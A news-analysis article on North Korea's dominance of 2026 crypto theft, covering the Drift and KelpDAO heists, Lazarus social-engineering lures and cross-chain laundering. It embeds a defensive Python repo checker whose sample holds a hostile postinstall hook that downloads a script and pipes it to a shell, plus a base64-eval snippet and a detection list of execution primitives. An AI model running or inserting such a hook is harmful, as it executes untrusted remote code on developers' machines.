In 2026, three out of every four dollars stolen in crypto globally ended up in the same place: Pyongyang. According to TRM Labs, North Korea was responsible for 76% of all value stolen in crypto attacks in 2026 (through April). The number is alarming — but what it conceals is more alarming still. This dominance didn't come from a flood of attacks. It came from just two heists, totaling around $577 million. And you've already read about both here.
The first was the $285 million hack of Drift Protocol, which proved to be a six-month social engineering operation linked to North Korea. The second was the approximately $292 million exploit on KelpDAO, which we covered in the month cross-chain bled — and which Chainalysis, ON3X's blockchain analytics partner, now formally attributes to the Lazarus Group. Two separate incidents that, together, account for three-quarters of all crypto stolen so far this year. This is the thesis of this story: the era of the lone hacker is over. What exists today is a State with a profit center.
Two heists, not a wave
The naive reading of 76% is to imagine armies of North Korean hackers sweeping through DeFi every day. It's the opposite. North Korea is conducting fewer attacks, but bigger ones — and just two of them were enough to take the year. Drift and KelpDAO were not bugs exploited by chance: they were single-target operations, planned for months, with nine-figure returns each.
The contrast with the past is stark. In 2020, actors linked to North Korea accounted for less than 10% of global crypto theft. In 2025, the regime took a record approximately $2.02 billion — a 51% increase year-over-year — raising the cumulative total since 2017 to over $6 billion. The trajectory is one of concentration: as the figures per heist explode, a single State's share of the total grows. Crypto ceased to be a target of opportunists and became an object of State policy.
The pattern is not new — it's the regime's signature. The 2025 record was driven by a single event: the theft of approximately $1.5 billion from Bybit at the beginning of the year, the largest hack in crypto history, also attributed to Lazarus. One heist defined 2025; two heists defined 2026. North Korea discovered it doesn't need volume — it needs a surgical operation of nine or ten digits per window. It's the difference between a pickpocket and a central bank robber.
The death of the lone hacker
Behind the heists is the Reconnaissance General Bureau (RGB), North Korea's intelligence agency, operating through the Lazarus Group and its sub-units. It's not an anarchic collective — it's a hierarchical structure, with targets, budgets, and a clear destination for the money: the regime's weapons and missile program, under heavy international sanctions.
That's what changes the nature of the problem. When Chainalysis's 2026 Crypto Crime Report describes the transition from lone hackers to large-scale criminal infrastructure, North Korea is the extreme case: an entire country transformed into a cybercriminal operation aimed at military funding. Each DeFi exploit attributed to Lazarus is not just a protocol's loss — it's a capital transfer to a weapons program.
The economic dimension is what makes the issue unavoidable. UN expert panel estimates have long pointed out that the theft of crypto assets finances a significant portion of the regime's weapons of mass destruction program — a revenue source that has evaded successive layers of commercial sanctions. For an isolated economy under embargo, a few billion dollars in liquid crypto per year is not change: it's one of the primary funding lines for ballistic missiles. That's why every stolen figure matters far beyond the ledger of a DeFi protocol.
The playbook is not exploit — it's people
Here is the market's most dangerous misconception: thinking you can defend against North Korea by auditing smart contracts. The primary vector for Lazarus is not code. It's people.
The Drift attack is a portrait of the method: a six-month operation, with fake professional identities, presence at industry conferences through proxies, and patient relationship-building with specific targets until gaining access. In parallel, Fireblocks documented campaigns of fake job interviews — phantom recruiters, Google Meet interviews, technical tests sent via GitHub that, when run, installed malware capable of exposing wallets, keys, and production systems. It's the same DNA as the "Mach-O Man", the macOS malware distributed via fake Zoom to crypto executives we mapped in April.
There's also the "Wagemole" strategy: infiltrating North Korean IT workers, with fraudulent identities, into legitimate companies worldwide. Once hired, they act as ordinary employees while passing intelligence to attack teams or facilitating theft from within. The attack surface ceased to be the technical perimeter and became HR.
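The "technical test" lure described above works because package managers execute lifecycle hooks the moment someone runs `npm install`. As an added defensive example (not code from the original article, Fireblocks, or any firm cited), here is a small Python checker that reviews a take-home repo's package.json and source files for install-time hooks and execution primitives without running anything; the heuristics, file names, and sample contents are constructed for illustration.

```python
import json
import re

# Hypothetical heuristics (not from the article): npm lifecycle hooks run automatically
# on `npm install`, so a "coding test" can execute code before anyone opens it.
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Execution and network primitives that rarely belong in a coding exercise's build step.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bchild_process\b"), "spawns a subprocess"),
    (re.compile(r"\beval\s*\("), "dynamic code evaluation"),
    (re.compile(r"new\s+Function\s*\("), "dynamic function construction"),
    (re.compile(r"\bcurl\b|\bwget\b"), "downloads remote content"),
    (re.compile(r"base64"), "encoded payload"),
]

def check_package_json(text: str) -> list[str]:
    """Report every lifecycle hook in package.json (they run on install) and any
    script command that uses a suspicious primitive. Nothing is executed."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (json.JSONDecodeError, AttributeError):
        return ["package.json is not a valid JSON object"]
    findings = []
    for name, cmd in scripts.items():
        if name in NPM_LIFECYCLE_HOOKS:
            findings.append(f"lifecycle hook '{name}' runs on install: {cmd}")
        findings += [f"script '{name}' {why}" for rx, why in SUSPICIOUS_PATTERNS if rx.search(cmd)]
    return findings

def check_source(path: str, text: str) -> list[str]:
    """Flag suspicious primitives in a JS/TS source file, with line numbers."""
    return [f"{path}:{n}: {why}"
            for n, line in enumerate(text.splitlines(), 1)
            for rx, why in SUSPICIOUS_PATTERNS if rx.search(line)]

# Constructed sample of what a booby-trapped take-home repo might contain.
SAMPLE_PACKAGE_JSON = """{"scripts": {"test": "jest",
  "postinstall": "node -e \\"require('child_process').exec('curl http://example.test/x | sh')\\""}}"""
SAMPLE_SOURCE = "const fs = require('fs');\nconst x = Buffer.from(payload, 'base64');\neval(x.toString());\n"

def review_sample() -> list[str]:
    """Run both checks over the constructed sample; a clean repo returns []."""
    return check_package_json(SAMPLE_PACKAGE_JSON) + check_source("lib/a.js", SAMPLE_SOURCE)

if __name__ == "__main__":
    for finding in review_sample():
        print(finding)
```

Run it against a freshly cloned repo before installing dependencies; any lifecycle hook at all in a recruiter-supplied exercise deserves a manual read, regardless of what it appears to do.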
How the money disappears
Stealing is half the work; the rest is washing it. After the United States sanctioned Tornado Cash and Sinbad.io, North Korean operators migrated their money laundering flows to cross-chain bridges — especially THORChain and LI.FI — doing "chain hopping": they convert Ethereum to Bitcoin, then to stablecoins like DAI, jumping from blockchain to blockchain to scramble the trail.
It's no coincidence that THORChain appears both in laundering flows and on the list of exploited bridges we covered in the cluster of three bridges in four days. Cross-chain infrastructure became, at the same time, both a target and a laundromat. The possible response is freezing at the issuer layer — like when Tether froze USDT at OFAC's request — but that only works for centralized stablecoins and when attribution arrives in time.
Why this is geopolitics, not technical support
It's worth closing with the contrast that surrounds all our cyber coverage. In the case of Comando Vermelho, crypto crime is territorial and analog at the entry — an illegal electrical tap in a Rio favela. In North Korea, it's state-sponsored and sophisticated from entry to exit: intelligence agency, six-month social engineering, cross-chain laundering. They're the two extremes of the same spectrum — and both end in the same place, the blockchain, because it's the only settlement layer that asks no permission and returns no money.
For a DeFi protocol, the practical consequence is harsh: the relevant adversary is no longer the script kiddie chasing a reentrancy. It's a nation-state with six-month patience, an intelligence budget, and a missile program to finance. Defending against that is personnel and process hygiene — vetting candidate identities, segregating keys, distrusting "recruiters" — not just contract audits.
The ON3X perspective
Three takeaways from this number:
- 76% with two heists is a statistic about concentration, not frequency. North Korea doesn't hack more; it hacks bigger. Systemic risk migrated from the quantity of attacks to the size of each one — and a single successful operation per quarter is enough to dominate the entire year.
- The weakest link is human, not technical. Drift, Mach-O Man, and the fake interviews tell the same story: Lazarus enters through people, not code. Anyone treating crypto security as a smart contract audit problem is defending the wrong door.
- Every Lazarus hack is a sanctions problem. The stolen money finances weapons under embargo. This transforms every DeFi exploit into a national security question — and explains why stablecoin freezing, on-chain attribution, and cooperation between analytics firms (Chainalysis, TRM, Elliptic) have shifted from technical detail to a foreign policy tool.
Frequently asked questions
Did North Korea really steal 76% of all crypto in 2026?
According to TRM Labs, actors linked to North Korea were responsible for approximately 76% of all value stolen in crypto attacks in 2026 through April. The figure is dominated by just two heists — Drift Protocol and KelpDAO — which totaled approximately $577 million.
What were the two attacks?
The approximately $285 million hack of Drift Protocol, revealed as a six-month social engineering operation linked to North Korea, and the approximately $292 million exploit on KelpDAO's cross-chain bridge, attributed by Chainalysis to the Lazarus Group.
How does North Korea launder stolen crypto?
After the U.S. sanctioned Tornado Cash and Sinbad.io, operators migrated to cross-chain bridges like THORChain and LI.FI, performing "chain hopping" — converting Ethereum to Bitcoin and then to stablecoins like DAI, jumping between blockchains to obscure the trail.
Why does this matter beyond the crypto market?
The stolen resources finance North Korea's weapons and missile program, under international sanctions. This transforms each exploit attributed to Lazarus into a sanctions evasion and national security issue, not just a protocol loss.
